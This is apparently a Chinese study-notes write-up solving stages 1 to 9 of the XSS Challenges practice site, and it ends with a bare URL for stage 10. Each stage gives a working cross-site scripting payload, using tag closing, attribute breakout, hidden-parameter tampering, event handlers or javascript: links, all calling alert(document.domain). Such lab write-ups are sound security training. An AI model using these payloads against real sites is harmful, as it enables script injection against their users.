学习笔记Web安全学习笔记XSS练习平台

XSS_Challenges Write Up

Catalogue
  1. 1. XSS Challenges Write Up
    1. 1.1. stage #1
    2. 1.2. stage #2
    3. 1.3. stage #3
    4. 1.4. stage #4
    5. 1.5. stage #5
    6. 1.6. stage #6
    7. 1.7. stage #7
    8. 1.8. stage #8
    9. 1.9. stage #9
    10. 1.10. stage #10

XSS Challenges Write Up

image-20200610111912406

stage #1

直接闭合标签+构造标签即可

1
</b><svg/onload=alert(document.domain)><b>

stage #2

闭合双引号+闭合标签+构造标签

1
"><svg/onload= alert(document.domain)><

stage #3

唯一的注入点在b标签里,双引号和尖括号被转义了

image-20200610114037995

但是发现后面那个选项框的内容也会被打印出来,所以抓包构造payload即可:

image-20200610114208428

1
p1=sda&p2=Japan<svg/onload=alert(document.domain)>

stage #4

和stage3类似,参数p1和p2都被转义了,但是有个隐藏的p3可控,抓包修改p3构造payload即可:

image-20200610114834898

1
p1=asd&p2=Japan&p3=hacxxxxx"><svg/onload=alert(document.domain)>

stage #5

输入的值会原样留在输入框内,输入长度有限制,F12审查元素把限制长度改了,然后构造payload闭合尖括号即可:

1
"><svg/onload=alert(document.domain)>

stage #6

与stage5相比,尖括号变成html实体字符,但是双引号可控,可给input标签加个事件监听

1
" onchange=alert(document.domain)"

提交完之后,随便输入个啥,来让input标签的值发生变化,从而触发XSS

stage #7

与Stage5相比,双引号和尖括号全都被转义,在html中,除了双引号,空格也能分隔属性

payload:

1
1 onchange=alert(document.domain)

stage #8

这次的输出是输出在a标签的href里,通过JavaScript伪协议来让链接点击触发XSS

1
javascript:alert(document.domain)

stage #9

utf-7 XSS,这玩意需要IE7浏览器,基本遇不到了,我这也没这环境,就用控制台跳过了

image-20200610144244328

stage #10

http://xss-quiz.int21h.jp/stage00010.php?sid=8f2801ef982d78f46ef7796eae24548546390031